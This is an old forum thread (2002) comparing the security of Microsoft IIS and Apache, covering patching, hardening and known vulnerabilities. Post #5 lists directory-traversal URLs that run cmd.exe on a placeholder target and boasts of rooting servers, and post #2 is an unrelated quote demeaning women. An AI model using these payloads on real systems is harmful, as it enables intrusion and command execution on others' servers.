-
April 15th, 2002, 03:55 PM
#1
The Power of IIS
what you need to know about running IIS and get useful of it .... you'll find it here ...
1- IIS allows universal CrossSiteScripting
2- Remote control of IIS
3- Microsoft IIS local and remote DoS
4- All versions of Microsoft IIS Remote buffer overflow (SYSTEM Level Access)
5- Unchecked Buffer in ISAPI Extension Could Enable Compromise of IIS 5.0 Server
http://www.astalavista.com/library/auditing/webserver/
When the power of Love overcomes the Love of power, the world will know peace... Jimi Hendrix
-------------------------------------------------------------
I dream of giving birth to a child who will ask...... what was war?
-
April 15th, 2002, 07:19 PM
#2
Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”
-
April 15th, 2002, 08:12 PM
#3
Or you could just run linux .
-
April 17th, 2002, 07:34 AM
#4
yeah ... linux will be a gr8 idea ...
When the power of Love overcomes the Love of power, the world will know peace... Jimi Hendrix
-------------------------------------------------------------
I dream of giving birth to a child who will ask...... what was war?
-
April 21st, 2002, 07:34 AM
#5
Hey Dude!
I whoud never run a IIS 4,5 server if i where you!
I'm spacialist i bug finding in IIS 4, 5 and it's not small bugs there are.... Plenty of big Remote Bugs!
try:
****************************************************************************************************************
http://www.TARGET.dk/scripts/..%255c...exe?/c+dir+c:\
http://www.TARGET.dk/msadc/..%255c.....exe?/c+dir+c:\
http://www.TARGET.dk/cgi-bin/..%255c...exe?/c+dir+c:\
http://www.TARGET.dk/samples/..%255c...exe?/c+dir+c:\
http://www.TARGET.dk/iisadmpwd/..%25...exe?/c+dir+c:\
http://www.TARGET.dk/_vti_cnf/..%255...system32/cmd.e
xe?/c+dir+c:\
http://www.TARGET.dk/_vti_bin/..%255...system32/cmd.e
xe?/c+dir+c:\
http://www.TARGET.dk/adsamples/..%25...system32/cmd.e
xe?/c+dir+c:\
****************************************************************************************************************
Then you will get a DIR over the target server.... But this is on a fresh install but there are 1000 of bugs in this shitty IIS servers..... I run Apache and it's what i will say the most stabil server i ever have discoverd! I have only positive words for Apache!
Give me 5 min and i will have a ROOT ascount on you'r IIS server!
-
April 21st, 2002, 03:41 PM
#6
i've post the thread coz' lots of members were asking about that issue ... as for me i don't even use it
When the power of Love overcomes the Love of power, the world will know peace... Jimi Hendrix
-------------------------------------------------------------
I dream of giving birth to a child who will ask...... what was war?
-
April 22nd, 2002, 10:42 PM
#7
Senior Member
Assuming that apache runs all these application mappings correct?
I've been using it (IIS) for years now and never had any problems with hacks, nimda, or the like. The first thing I did back in March of 2000 when IIS 5 came out with Win2k was remove ALL application mappings, virtual directories and like.
Sure I keep up with patches, but the exploits I find always target mappings I don't use. So I'm not too worried. I also write my own programs to monitor my server for suspisous activity and have had fun sending hackers to my http blackhole many times
I too, stay away from MS remote tools, I create my own, works much better
You can really get ROOT of IIS in under 5 minutes? If I e-mail you my server address would you feel free to root it for me, I will at least have piece of mind because rooting my own machine just doesn't satisfy me about the security setup I have.
-
April 22nd, 2002, 11:00 PM
#8
Originally posted here by knightmb
You can really get ROOT of IIS in under 5 minutes? If I e-mail you my server address would you feel free to root it for me, I will at least have piece of mind because rooting my own machine just doesn't satisfy me about the security setup I have.
Well, in my opinion, just having to keep up with the patches on IIS far outweighs its usefulness. That is, I don't like to have to patch a box every week for fear of getting the site defaced either through a worm or someone's "lack of something better to do." Running Apache, on the other hand, I'm usually happy to be able to read the CHANGES file at my relative leisure, then make a calculated decision if I need to recompile the thing or not... I'm happy to say that, mostly, there's not a usually huge rush to replace an Apache install for fear of it getting whacked - for the last few IIS vulnerabilities I've seen, usually the server's 0wn3d before you can get it replaced (ok, maybe not always that bad, but the urgency is usually severely heightened).
\"Windows has detected that a gnat has farted in the general vicinity. You must reboot for changes to take affect. Reboot now?\"
-
April 23rd, 2002, 12:19 AM
#9
Junior Member
There is no best one.
Microsoft's IIS and Apache HTTP are both equal. If they are both properly configured properly
they are resistant to almost all attacks. But then there are a few exceptions like an exploit
that allows a cracker access.
THE LARGEST REASON FOR WEB SERVERS AND BEING HACKED IS THE RESULT OF POOR ADMINISTRATION
Both IIS and Apache have exploits, but IIS's are more publisized. There is no webserver that
is better then the other. If you reley on just the default settings you deserved being hacked.
Networks shoule have multiple security defenses and plans. Such as the following
Border router
Perimeter network (DMZ)
software firewall
packet filtering/inspection from software or hardware
Change standard ports eg. Telnet, SSH
etc.
Just though i would point that out.
If liking computers makes me a nerd, so be it, i am a computer nerd.
-
April 23rd, 2002, 01:25 AM
#10
Re: There is no best one.
Originally posted here by P4XEON
Microsoft's IIS and Apache HTTP are both equal. If they are both properly configured properly
they are resistant to almost all attacks. But then there are a few exceptions like an exploit
that allows a cracker access.
THE LARGEST REASON FOR WEB SERVERS AND BEING HACKED IS THE RESULT OF POOR ADMINISTRATION
I mostly agree with that, except:
1) Take both IIS and Apache out of the box and run it. Chances are, the Apache server is going to be reasonably configured and won't have any serious issues - the same is almost certainly not true for the IIS box.
2) Most "I can run a website" n00bs are going to probably want the point-and-clickness of something like IIS, and aren't going to bother to RTFM. This increases the problem significantly.
3) Looking at SecurityFocus and/or CERT (to mention only a couple), there are certainly more IIS warnings than Apache. Given market penetration of Apache, I'm unlikely to believe that it's "just because M$ is being targetted."
I can only conclude that, overall, IIS is going to be a much bigger burden to manage and/or admin than Apache. Plus, I don't need to run a GUI to run an efficient Apache server (kinda helps, since most of my machines I run without a head).
And has anyone ever tried to chroot an IIS instance or otherwise sandbox it?
\"Windows has detected that a gnat has farted in the general vicinity. You must reboot for changes to take affect. Reboot now?\"
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|